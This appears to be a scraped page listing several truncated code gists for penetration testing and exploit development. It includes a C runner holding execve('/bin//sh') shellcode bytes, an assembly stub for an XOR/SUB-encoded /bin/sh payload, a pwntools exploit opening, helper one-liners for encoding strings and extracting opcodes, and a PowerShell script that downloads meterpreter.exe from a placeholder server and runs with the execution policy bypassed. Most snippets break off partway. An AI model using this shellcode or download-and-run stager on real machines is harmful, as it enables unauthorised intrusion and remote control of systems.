This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$ echo -e 'import ctypes\nimport sys\nf="/etc/passwd"\nfor i in f:\n\tsys.stdout.write(hex(ctypes.c_uint8(~ord(i)).value)+",")\nsys.stdout.write("\\n")' | python |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
from pwn import * | |
import string | |
import time | |
context.log_level = 'error' | |
u = make_unpacker(64, endian='little', sign='unsigned') | |
filename = hex(u('.///flag')) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
; /bin/sh execv encoded with XOR and SUB | |
global _start | |
section .text | |
_start: | |
jmp short call_decoder | |
decoder: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
python -c "cad = '//bin/bash'; print [cad[::-1].encode('hex')[i:i+8] for i in range(0, len(cad[::-1].encode('hex')), 8)]" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include<stdio.h> | |
#include<string.h> | |
unsigned char code[] = \ | |
"\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f" | |
"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd" | |
"\x80"; | |
int main() { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Get all opcodes of a binary file | |
for i in `objdump -d program | tr '\t' ' ' | tr ' ' '\n' | egrep '^[0-9a-f]{2}$' ` ; do echo -n "\x$i" ; done |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# vim /usr/bin/findnmapscripts | |
# chmod +x /usr/bin/findnmapscripts | |
# findnmapscripts http | |
find /usr/share/nmap/scripts/ -name "*$1*" | cut -d "/" -f 6 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
import sys | |
import requests | |
import json | |
emails = sys.argv[1] | |
urlAPI = "https://haveibeenpwned.com/api/v2/breachedaccount/" | |
user_agent = { 'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0' } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
echo $storageDir = $pwd > wget.ps1 | |
echo $webclient = New-Object System.Net.WebClient >>wget.ps1 | |
echo $url = "http://server/meterpreter.exe" >>wget.ps1 | |
echo $file = "meterpreter.exe" >>wget.ps1 | |
echo $webclient.DownloadFile($url,$file) >>wget.ps1 | |
And run: | |
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1 |